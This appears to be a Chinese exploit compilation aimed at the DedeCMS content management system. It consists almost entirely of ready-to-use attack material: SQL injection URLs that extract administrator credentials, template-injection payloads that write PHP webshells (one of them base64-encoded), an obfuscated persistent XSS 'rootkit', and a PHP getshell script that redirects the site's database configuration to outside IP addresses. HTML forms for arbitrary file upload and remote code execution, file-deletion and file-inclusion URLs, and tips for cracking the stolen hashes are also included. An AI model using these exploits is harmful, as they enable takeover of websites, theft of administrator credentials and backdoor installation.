dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:
本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行 a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码xiao,直接生成一句话。
dede 5.6 GBK SQL注入漏洞
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/>
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''"><******%20src=http://www.test.com/
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS(织梦)变量覆盖getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
);
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' [url]www.site.com[/url] 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "[*] Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>;
织梦(DedeCms) v5.6-5.7 越权访问漏洞(直接进入后台)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
此漏洞的前提是必须得到后台路径才能实现
dedecms织梦 标签远程文件写入漏洞
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
再用下面表单提交,shell 就在同目录下 1.php。
原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
Dedecms <= V5.6 Final模板执行漏洞
1 上传一个模板文件:
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2 修改刚刚发表的文章,查看源文件,构造一个表单:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>
<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>
</div>
</div>
</form>
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell:1.php
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦(Dedecms)V5.6 远程文件删除漏洞
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuyaction.php?dopost=return&code=../../
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
dedecms织梦 v5.6 两处跨站漏洞
/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.test.net%3E&PageNo=2
http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.test.net%3E
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞
为了闭合我用了两次union http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS 5.1 SQL Injection ######################### Securitylab.ir ########################
# Application Info:
# Name: DEDECMS
# Version: 5.1
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===========================================================
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
织梦(dedecms)V5.5分页处理函数信息泄露漏洞
http://www.dedecms.com/plus/list.php?tid=10&pageno=0
http://www.dedecms.com/plus/list.php?tid=10&pageno='
http://www.dedecms.com/plus/list.php?tid=10&pageno=-1
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1. 访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见错误信息
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
按确定后的看到第2步骤的信息表示文件木马上传成功.
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
DEDECMS跨站及爆绝对路径漏洞
提交:http://127.0.0.1/dc/include/jump.php?gurl=http://00day.cn 会跳转到http://00day.cn
新手朋友会认为这就是这个跨站的利用了,其实不然,我们可以尝试去闭合他!但PHP有gpc限制,我们该怎么绕?
提交:http://127.0.0.1/dc/include/jump.php?gurl=%23"</script><script>alert(/00day.cn/)</script>/*
Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x # .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]
- Php Path Discusion -
[DedeCms WebSite]/include/dialog/
- XSRF -
[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker wright a "end of textarea" </textarea> tag thats give XSS alert :)
[XSS Code] :</script>'"><script>alert(document.cookie)</script>
织梦(dedecms)2007 group/search.php注入漏洞
http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'